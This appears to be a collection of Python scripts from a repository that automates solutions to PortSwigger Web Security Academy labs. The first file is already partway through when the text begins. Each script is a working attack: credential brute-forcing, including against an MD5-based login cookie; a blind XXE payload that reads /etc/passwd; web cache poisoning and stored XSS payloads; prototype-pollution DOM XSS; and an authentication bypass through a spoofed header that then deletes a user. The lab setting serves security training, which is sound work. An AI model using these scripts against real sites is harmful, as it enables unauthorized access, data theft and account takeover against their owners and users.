15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def connect_as_carlos(s, url):
26 | 	login_path = url + '/login'
27 | 	print(f"\n[+] Trying to log in as Carlos with many passwords...")
28 | 	headers = {'Content-Type': 'text/plain;charset=UTF-8'}
29 | 	login_data = {
30 | 		"username": "carlos",
31 | 		"password": []
32 | 	}
33 | 	with open('./passwords.txt') as f:
34 | 		for line in f:
35 | 			password = line.strip()
36 | 			login_data['password'].append(password)
37 | 	print(login_data)
38 | 	r = s.post(login_path, json=login_data, headers=headers)
39 | 	if 'Your username is: carlos' in r.text:
40 | 		return r
41 | 	else:
42 | 		print('[-] Exploit failed to connect as Carlos <!>')
43 | 		sys.exit(1)
44 | 
45 | 
46 | ##########################################################
47 | #	MAIN
48 | ##########################################################
49 | 
50 | def main():
51 | 	print('[+] Lab: Broken brute-force protection, multiple credentials per request')
52 | 	parser = argparse.ArgumentParser(description="[+] Lab: Broken brute-force protection, multiple credentials per request")
53 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
54 | 	args = parser.parse_args()
55 | 	s = requests.Session()
56 | 	s.proxies = proxies		# Comment this line to disable proxying
57 | 	s.verify = False
58 | 	try:
59 | 		r = s.get(args.url, allow_redirects=False)
60 | 		time.sleep(1)
61 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
62 | 			print('\n[-] HOST seems to be down <!>')
63 | 			sys.exit(-1)
64 | 		else:
65 | 			print('[+] Trying to find valid credentials brute-forcing the login page...\n')
66 | 			time.sleep(1)
67 | 			parsed_url = urllib.parse.urlparse(args.url)
68 | 			host = parsed_url.netloc
69 | 			if parsed_url.port:
70 | 				port = parsed_url.port
71 | 			elif parsed_url.scheme == "https":
72 | 				port = 443
73 | 			elif parsed_url.scheme == "http":
74 | 				port = 80
75 | 			print(parsed_url)
76 | 			url = parsed_url.scheme + '://' + host
77 | 			time.sleep(2)
78 | 			password = connect_as_carlos(s, url)
79 | 			time.sleep(1)
80 | 			r = s.get(url + '/my-account')
81 | 			s.cookies.clear()
82 | 			time.sleep(2)
83 | 			r = s.get(url)
84 | 			if 'Congratulations, you solved the lab!' in r.text:
85 | 				print('\n[+] The lab is solved !')
86 | 	except requests.exceptions.ProxyError:
87 | 		print('[-] PROXY seems to be missconfigured <!>')
88 | 	except KeyboardInterrupt:
89 | 		sys.exit(0)
90 | 
91 | if __name__ == "__main__":
92 | 	main()
93 | 


--------------------------------------------------------------------------------
/XXE/exploit-lab09.py:
--------------------------------------------------------------------------------
 1 | # Exploiting XXE to retrieve data by repurposing a local DTD
 2 | 
 3 | # https://portswigger.net/web-security/xxe/blind/lab-xxe-trigger-error-message-by-repurposing-local-dtd
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def send_xxe(s, url):
26 | 	check_stock_path = url + '/product/stock'
27 | 	exploit_body = """<?xml version="1.0" encoding="UTF-8"?>
28 | <!DOCTYPE Gwyo [
29 | <!ENTITY % local_dtd SYSTEM "file:////usr/share/yelp/dtd/docbookx.dtd">
30 | <!ENTITY % ISOamso '
31 | <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
32 | <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27; file:///nonexistent/&#x25;file;&#x27;>">
33 | &#x25;eval;
34 | &#x25;error;
35 | '>
36 | %local_dtd;
37 | ]><stockCheck><productId>7</productId><storeId>1</storeId></stockCheck>"""
38 | 	headers = {"Content-Type": "application/xml"}
39 | 	print('[+] Using payload:\t%s' % exploit_body)
40 | 	print('[+] Using headers:\t%s' % headers)
41 | 	r = s.post(check_stock_path, data=exploit_body, headers=headers)
42 | 	time.sleep(2)
43 | 	res = r.text
44 | 	print(res)
45 | 	return r
46 | 
47 | 
48 | ##########################################################
49 | #	FUNCTIONS
50 | ##########################################################
51 | 
52 | def main():
53 | 	print('[+] Lab: Exploiting XXE to retrieve data by repurposing a local DTD')
54 | 	parser = argparse.ArgumentParser(description="[+] Lab: Exploiting blind XXE to retrieve data by repurposing a local DTD")
55 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
56 | 	args = parser.parse_args()
57 | 	parsed_url = urllib.parse.urlparse(args.url)
58 | 	host = parsed_url.netloc
59 | 	print(parsed_url)
60 | 	url = parsed_url.scheme + '://' + host
61 | 	s = requests.Session()
62 | 	s.proxies = proxies		# Comment this line to disable proxying
63 | 	s.verify = False
64 | 	try:
65 | 		r = s.get(url, allow_redirects=False)
66 | 		time.sleep(1)
67 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
68 | 			print('\n[-] HOST seems to be down <!>')
69 | 			sys.exit(-1)
70 | 		else:
71 | 			print("[+] Trying send a XXE attack to retrieve the content of /etc/passwd...")
72 | 			r = send_xxe(s, url)
73 | 			s.cookies.clear()
74 | 			s.headers.clear()
75 | 			time.sleep(5)
76 | 			r = s.get(url, allow_redirects=False)
77 | 			time.sleep(1)
78 | 			if r.status_code == 200 and 'Congratulations, you solved the lab!' in r.text:
79 | 				print('[+] The lab is solved !')
80 | 			elif r.status_code == 200:
81 | 				print('[+] The Exploit sent the given payload !')
82 | 	except requests.exceptions.ProxyError:
83 | 		print('[-] PROXY seems to be missconfigured <!>')
84 | 	except KeyboardInterrupt:
85 | 		sys.exit(0)
86 | 
87 | if __name__ == "__main__":
88 | 	main()
89 | 


--------------------------------------------------------------------------------
/WebCachePoisoning/exploit-lab06.py:
--------------------------------------------------------------------------------
 1 | # Web cache poisoning via an unkeyed query parameter
 2 | 
 3 | # https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-unkeyed-param
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def send_sequence(s, url):
26 | 	cache_payload = "/?utm_content='/><script>alert(1)</script>"
27 | 	print('[+] Trying to poison the cache for the home page:\n\t%s' % cache_payload)
28 | 	cache_url = url + cache_payload
29 | 	s.cookies.clear()
30 | 	solved = False
31 | 	while solved == False:
32 | 		s.headers.clear()
33 | 		s.cookies.clear()
34 | 		r = s.get(url)
35 | 		time.sleep(1)
36 | 		if 'Congratulations, you solved the lab!' in r.text:
37 | 			print('\n[+] The lab is solved !')
38 | 			solved = True
39 | 			break
40 | 		print('\n[+] Sending cache poisoning request...')
41 | 		cache_buster = url + '/?cb=1234'
42 | 		r = s.get(cache_buster, allow_redirects=False)
43 | 		time.sleep(2)
44 | 		if "X-Cache" in r.headers:
45 | 			if r.headers['X-Cache'] == 'hit':
46 | 				s.headers.clear()
47 | 				r = s.get(cache_url, allow_redirects=False)
48 | 				if "X-Cache" in r.headers:
49 | 					if r.headers['X-Cache'] == "hit":
50 | 						print('[+] Cache poisoned')
51 | 						time_left =(35 - int(r.headers['Age']))
52 | 						print('[+] Waiting %s seconds before retry...' % str(time_left))
53 | 						time.sleep(time_left)
54 | 					else:
55 | 						print('[+] Received "X-cache: miss"...')
56 | 						time.sleep(2)
57 | 
58 | 
59 | ##########################################################
60 | #	MAIN
61 | ##########################################################
62 | 
63 | def main():
64 | 	print('[+] Lab: Web cache poisoning via an unkeyed query parameter')
65 | 	parser = argparse.ArgumentParser(description="[+] Lab: Web cache poisoning with an unkeyed parameter")
66 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
67 | 	args = parser.parse_args()
68 | 	parsed_url = urllib.parse.urlparse(args.url)
69 | 	host = parsed_url.netloc
70 | 	print(parsed_url)
71 | 	url = parsed_url.scheme + '://' + host
72 | 	s = requests.Session()
73 | 	s.proxies = proxies		# Comment this line to disable proxying
74 | 	s.verify = False
75 | 	try:
76 | 		r = s.get(url, allow_redirects=False)
77 | 		time.sleep(1)
78 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
79 | 			print('\n[-] HOST seems to be down <!>')
80 | 			sys.exit(-1)
81 | 		else:
82 | 			print('[+] Trying to send Web Cache Poisoning attack...\n')
83 | 			time.sleep(1)
84 | 			send_sequence(s, url)
85 | 	except requests.exceptions.ProxyError:
86 | 		print('[-] PROXY seems to be missconfigured <!>')
87 | 	except KeyboardInterrupt:
88 | 		sys.exit(0)
89 | 
90 | if __name__ == "__main__":
91 | 	main()
92 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab02.py:
--------------------------------------------------------------------------------
 1 | # Stored XSS into HTML context with nothing encoded
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encoded
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | import argparse
14 | 
15 | 
16 | warnings.filterwarnings("ignore", category=DeprecationWarning)
17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18 | 
19 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 | 
21 | 
22 | ##########################################################
23 | #	FUNCTIONS
24 | ##########################################################
25 | 
26 | def get_csrf_token(r):
27 | 	soup = BeautifulSoup(r.content, 'html.parser')
28 | 	csrf_input = soup.find("input", {'name':'csrf'})
29 | 	csrf = csrf_input['value']
30 | 	print('[+] Found CSRF Token:\t%s' % csrf)
31 | 	return csrf
32 | 
33 | def send_xss(s, url):
34 | 	form_path = url + '/post?postId=1'
35 | 	r = s.get(form_path)
36 | 	csrf_token = get_csrf_token(r)
37 | 	comment_path = url + '/post/comment'
38 | 	xss_payload = "<img src=x onerror=alert(1) />"
39 | 	comment_data = {
40 | 		"csrf": csrf_token,
41 | 		"postId": "1",
42 | 		"email": "test@attacker.com",
43 | 		"name": "gwyo",
44 | 		"website": "",
45 | 		"comment": xss_payload
46 | 	}
47 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % comment_path)
48 | 	print('[+] Using payload in comment field:\t%s' % xss_payload)
49 | 	r = s.post(comment_path, data=comment_data)
50 | 	return r
51 | 
52 | 
53 | ##########################################################
54 | #	MAIN
55 | ##########################################################
56 | 
57 | def main():
58 | 	print('[+] Lab: Stored XSS into HTML context with nothing encoded')
59 | 	parser = argparse.ArgumentParser(description="[+] Lab: Stored XSS into HTML context with nothing encoded")
60 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
61 | 	args = parser.parse_args()
62 | 	parsed_url = urllib.parse.urlparse(args.url)
63 | 	host = parsed_url.netloc
64 | 	print(parsed_url)
65 | 	url = parsed_url.scheme + '://' + host
66 | 	s = requests.Session()
67 | 	s.proxies = proxies		# Comment this line to disable proxying
68 | 	s.verify = False
69 | 	try:
70 | 		r = s.get(url, allow_redirects=False)
71 | 		time.sleep(1)
72 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
73 | 			print('\n[-] HOST seems to be down <!>')
74 | 			sys.exit(-1)
75 | 		else:
76 | 			print('[+] Trying send a cross-site scripting attack that store the alert function...')
77 | 			r = send_xss(s, url)
78 | 			s.cookies.clear()
79 | 			s.headers.clear()
80 | 			time.sleep(3)
81 | 			r = s.get(url)
82 | 			if r.status_code == 200 and 'Congratulations, you solved the lab!' in r.text:
83 | 				print('[+] The lab is solved')
84 | 			elif r.status_code == 200:
85 | 				print('[+] The Exploit sent the given payload !')
86 | 			else:
87 | 				print('[-] The Exploit failed <!>')
88 | 	except requests.exceptions.ProxyError:
89 | 		print('[-] PROXY seems to be missconfigured <!>')
90 | 	except KeyboardInterrupt:
91 | 		sys.exit(0)
92 | 
93 | if __name__ == "__main__":
94 | 	main()
95 | 


--------------------------------------------------------------------------------
/InformationDisclosure/exploit-lab04.py:
--------------------------------------------------------------------------------
 1 | # Authentication bypass via information disclosure
 2 | 
 3 | # https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-authentication-bypass
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def send_trace_req(url):
26 | 	req = requests.Request('TRACE', url)
27 | 	r = req.prepare()
28 | 	s = requests.Session()
29 | 	resp = s.send(r)
30 | 	return resp
31 | 
32 | def get_header(url):
33 | 	print('\n[+] Trying to retrieve the header sending a TRACE request to the admin page...\n')
34 | 	admin_path = url + '/admin'
35 | 	r = send_trace_req(admin_path)
36 | 	time.sleep(1)
37 | 	print(r.text)
38 | 	header = r.text.encode().split(b'\r\n')[-3].split(b': ')[0].decode()
39 | 	print('[+] Found Header:\t%s' % header)
40 | 	time.sleep(1)
41 | 	return header
42 | 
43 | def delete_carlos(s, url, header):
44 | 	headers = {header: '127.0.0.1'}
45 | 	print('\n[+] Trying to access to the admin panel with header:\n%s' % headers)
46 | 	admin_path = url + '/admin'
47 | 	r = s.get(admin_path, headers=headers)
48 | 	time.sleep(1)
49 | 	print('\n[+] Trying to delete Carlos user...')
50 | 	delete_user_path = url + '/admin/delete?username=carlos'
51 | 	r = s.get(delete_user_path, headers=headers)
52 | 	time.sleep(1)
53 | 	return r
54 | 
55 | 
56 | ##########################################################
57 | #	MAIN
58 | ##########################################################
59 | 
60 | def main():
61 | 	print('[+] Lab: Authentication bypass via information disclosure')
62 | 	parser = argparse.ArgumentParser(description="[+] Lab: Authentication bypass via information disclosure")
63 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
64 | 	args = parser.parse_args()
65 | 	parsed_url = urllib.parse.urlparse(args.url)
66 | 	host = parsed_url.netloc
67 | 	print(parsed_url)
68 | 	url = parsed_url.scheme + '://' + host
69 | 	s = requests.Session()
70 | 	s.proxies = proxies		# Comment this line to disable proxying
71 | 	s.verify = False
72 | 	try:
73 | 		r = s.get(url, allow_redirects=False)
74 | 		time.sleep(1)
75 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
76 | 			print('\n[-] HOST seems to be down <!>')
77 | 			sys.exit(-1)
78 | 		else:
79 | 			print('[+] Trying to find a way to bypass authentication to delete carlos...\n')
80 | 			time.sleep(1)
81 | 			header = get_header(url)
82 | 			r = delete_carlos(s, url, header)
83 | 			s.cookies.clear()
84 | 			time.sleep(2)
85 | 			r = s.get(url)
86 | 			if 'Congratulations, you solved the lab!' in r.text:
87 | 				print('\n[+] The lab is solved !')
88 | 	except requests.exceptions.ProxyError:
89 | 		print('[-] PROXY seems to be missconfigured <!>')
90 | 	except KeyboardInterrupt:
91 | 		sys.exit(0)
92 | 
93 | if __name__ == "__main__":
94 | 	main()
95 | 


--------------------------------------------------------------------------------
/PrototypePollution/exploit-lab01.py:
--------------------------------------------------------------------------------
 1 | # DOM XSS via client-side prototype pollution
 2 | 
 3 | # https://portswigger.net/web-security/prototype-pollution/client-side/lab-prototype-pollution-dom-xss-via-client-side-prototype-pollution
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def find_js(s, url):
26 | 	print('\n[+] Trying to find javascript files loaded on the home page...')
27 | 	s.cookies.clear()
28 | 	s.headers.clear()
29 | 	r = s.get(url)
30 | 	js_files = re.findall(r"<script src='(.*)'></", r.text)
31 | 	for file_path in js_files:
32 | 		print('\n[+] Found javascript file path:\n%s' % file_path)
33 | 		js_content = s.get(url + file_path).text
34 | 		time.sleep(2)
35 | 		print('\n--------------------------------------------\n')
36 | 		print('%s' % js_content)
37 | 		print('\n--------------------------------------------')
38 | 		time.sleep(2)
39 | 		if 'config.transport_url' in js_content:
40 | 			print('[+] Found "transport_url" property potentially reflected in the rendered page !')
41 | 			return file_path
42 | 
43 | def inject_prototype(s, url):
44 | 	print('\n[+] Trying to inject javascript prototype...')
45 | 	time.sleep(2)
46 | 	payload = '/?__proto__[transport_url]=data:,alert(1);'
47 | 	injection_path = url + payload
48 | 	print('[+] Navigating to %s' % injection_path)
49 | 	r = s.get(injection_path)
50 | 
51 | 
52 | ##########################################################
53 | #	MAIN
54 | ##########################################################
55 | 
56 | def main():
57 | 	print('[+] Lab: DOM XSS via client-side prototype pollution')
58 | 	parser = argparse.ArgumentParser(description="[+] Lab: DOM XSS via client-side prototype pollution")
59 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
60 | 	args = parser.parse_args()
61 | 	parsed_url = urllib.parse.urlparse(args.url)
62 | 	host = parsed_url.netloc
63 | 	print(parsed_url)
64 | 	url = parsed_url.scheme + '://' + host
65 | 	s = requests.Session()
66 | 	s.proxies = proxies		# Comment this line to disable proxying
67 | 	s.verify = False
68 | 	try:
69 | 		r = s.get(url, allow_redirects=False)
70 | 		time.sleep(1)
71 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
72 | 			print('\n[-] HOST seems to be down <!>')
73 | 			sys.exit(-1)
74 | 		else:
75 | 			print("\n[+] Trying to send a find a javascript object to send a DOM XSS...")
76 | 			path = find_js(s, url)
77 | 			time.sleep(2)
78 | 			r = inject_prototype(s, url)
79 | 			s.cookies.clear()
80 | 			time.sleep(2)
81 | 			r = s.get(url)
82 | 			if 'Congratulations, you solved the lab!' in r.text:
83 | 				print('\n[+] The lab is solved !')
84 | 	except requests.exceptions.ProxyError:
85 | 		print('[-] PROXY seems to be missconfigured <!>')
86 | 	except KeyboardInterrupt:
87 | 		sys.exit(0)
88 | 
89 | if __name__ == "__main__":
90 | 	main()
91 | 


--------------------------------------------------------------------------------
/Authentication/exploit-lab09.py:
--------------------------------------------------------------------------------
 1 | # Brute-forcing a stay-logged-in cookie
 2 | 
 3 | # https://portswigger.net/web-security/authentication/other-mechanisms/lab-brute-forcing-a-stay-logged-in-cookie
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import hashlib
13 | import base64
14 | import argparse
15 | 
16 | 
17 | warnings.filterwarnings("ignore", category=DeprecationWarning)
18 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
19 | 
20 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
21 | 
22 | 
23 | ##########################################################
24 | #	FUNCTIONS
25 | ##########################################################
26 | 
27 | def encode_cookie(password):
28 | 	md5value = hashlib.md5(password.encode()).hexdigest()
29 | 	str = f'carlos:{md5value}'
30 | 	b64 = base64.b64encode(str.encode())
31 | 	return b64.decode()
32 | 
33 | def connect_as_carlos(s, url):
34 | 	print('\n[+] Brute-forcing the "stay-logged-in" cookie value...')
35 | 
36 | 	account_path = url + '/my-account'
37 | 	with open('./passwords.txt') as f:
38 | 		for line in f:
39 | 			password = line.strip()
40 | 			sys.stdout.write('\r[+] Trying password:\t%s%s' % (password, ' ' * (12 - len(password))))
41 | 			cookie = encode_cookie(password)
42 | 			cookies = {'stay-logged-in': cookie}
43 | 			r = s.get(account_path, cookies=cookies, allow_redirects=False)
44 | 			sys.stdout.flush()
45 | 			if 'Your username is: carlos' in r.text:
46 | 				print('\n[+] Logged in as Carlos !')
47 | 				return r
48 | 	print(f'[-] Brute force failed <!>')
49 | 	sys.exit(1)
50 | 
51 | 
52 | ##########################################################
53 | #	MAIN
54 | ##########################################################
55 | 
56 | def main():
57 | 	print('[+] Lab: Brute-forcing a stay-logged-in cookie')
58 | 	parser = argparse.ArgumentParser(description="[+] Lab: Brute-forcing a stay-logged-in cookie")
59 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
60 | 	args = parser.parse_args()
61 | 	s = requests.Session()
62 | 	s.proxies = proxies		# Comment this line to disable proxying
63 | 	s.verify = False
64 | 	try:
65 | 		r = s.get(args.url, allow_redirects=False)
66 | 		time.sleep(1)
67 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
68 | 			print('\n[-] HOST seems to be down <!>')
69 | 			sys.exit(-1)
70 | 		else:
71 | 			print('[+] Trying to find a way to access Carlos account...\n')
72 | 			time.sleep(1)
73 | 			parsed_url = urllib.parse.urlparse(args.url)
74 | 			host = parsed_url.netloc
75 | 			if parsed_url.port:
76 | 				port = parsed_url.port
77 | 			elif parsed_url.scheme == "https":
78 | 				port = 443
79 | 			elif parsed_url.scheme == "http":
80 | 				port = 80
81 | 			print(parsed_url)
82 | 			url = parsed_url.scheme + '://' + host
83 | 			time.sleep(2)
84 | 			r = connect_as_carlos(s, url)
85 | 			s.cookies.clear()
86 | 			time.sleep(2)
87 | 			r = s.get(url)
88 | 			if 'Congratulations, you solved the lab!' in r.text:
89 | 				print('\n[+] The lab is solved !')
90 | 	except requests.exceptions.ProxyError:
91 | 		print('[-] PROXY seems to be missconfigured <!>')
92 | 	except KeyboardInterrupt:
93 | 		sys.exit(0)
94 | 
95 | if __name__ == "__main__":
96 | 	main()
97 | 


--------------------------------------------------------------------------------